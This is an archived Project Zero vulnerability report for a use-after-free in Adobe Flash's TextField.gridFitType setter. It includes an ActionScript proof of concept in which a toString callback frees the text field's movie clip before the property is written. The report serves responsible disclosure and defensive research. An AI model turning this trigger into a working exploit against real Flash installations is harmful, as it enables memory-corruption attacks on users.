search

xti9er / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free in TextField.gridFitType setter #559

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
There is a use-after-free in the TextField gridFitType setter. If it is set to 
an object with a toString method that frees the TextField, the property will be 
written after it is freed.

A PoC is as follows:

var toptf = this.createEmptyMovieClip("toptf", 1);

function func(){

    toptf.removeMovieClip();    
    trace("here");
    return "none";
}

var o = {toString : func};

var my_format:TextFormat = new TextFormat();
my_format.font = "Times-12";

var my_text1:TextField = toptf.createTextField("my_text1", 
toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
my_text1.text = "this.gridFitType = none";
my_text1.embedFonts = true;
my_text1.antiAliasType = "advanced";
my_text1.gridFitType = o;
my_text1.setTextFormat(my_format); 

var my_text2:TextField = toptf.createTextField("my_text2", 
toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
my_text2.text = "this.gridFitType = advanced";
my_text2.embedFonts = true;
my_text2.antiAliasType = "advanced";
my_text2.gridFitType = "pixel";
my_text2.setTextFormat(my_format); 

var my_text3:TextField = toptf.createTextField("my_text3", 
toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
my_text3.text = "this.gridFitType = subpixel";
my_text3.embedFonts = true;
my_text3.antiAliasType = "advanced";
my_text3.gridFitType = "subpixel";
my_text3.setTextFormat(my_format);

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 7 Oct 2015 at 11:21

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 8 Oct 2015 at 10:23

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 6 Nov 2015 at 7:06

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 17 Dec 2015 at 7:23